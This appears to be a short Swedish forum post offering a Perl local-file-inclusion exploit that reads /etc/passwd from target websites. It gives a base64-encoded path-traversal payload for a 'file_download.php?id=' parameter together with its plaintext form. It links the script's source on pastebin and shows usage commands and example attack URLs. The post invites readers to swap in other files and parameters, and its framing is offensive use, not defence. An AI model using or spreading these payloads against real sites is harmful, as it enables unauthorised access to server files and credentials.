LFI exploit.
*OBS* Denna exploit fungerar endast på Linux miljöer. *OBS*
Kort förklaring vad exploiten gör för något:
Du anger ett hostname som du vill köra exploiten mot, så försöker den ladda hem /etc/passwd/ genom att använda sig av base64-encoding som vissa hemsidor har missat att täppa igen.
Så här ser koden ut för /etc/passwd/:
Kod:
$File="file_download.php?id=Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==";
I plane-text så ser det ut så här.. Det går att ändra till vad man nu vill ha.
Kod:
$File="file_download.php?id=../../../../../../etc/passwd
Du kan byta ut
"file_download.php?id=" till vad som nu passar dig.
Ladda hem källkoden här:
Kod:
http://pastebin.com/G2Ge0uqv
Kommandon:
* perl scriptnamn.pl hostname /path
* perl scriptnamn.pl hostname /
Om du skriver t.ex. så här:
perl scriptnamn.pl test.se /test
Så försöker den exploita
Kod:
http://test.se/test/file_download.php?id=Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
perl scriptnamn.pl test.se /
Kod:
http://test.se/file_download.php?id=Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Ja ni förstår säkert!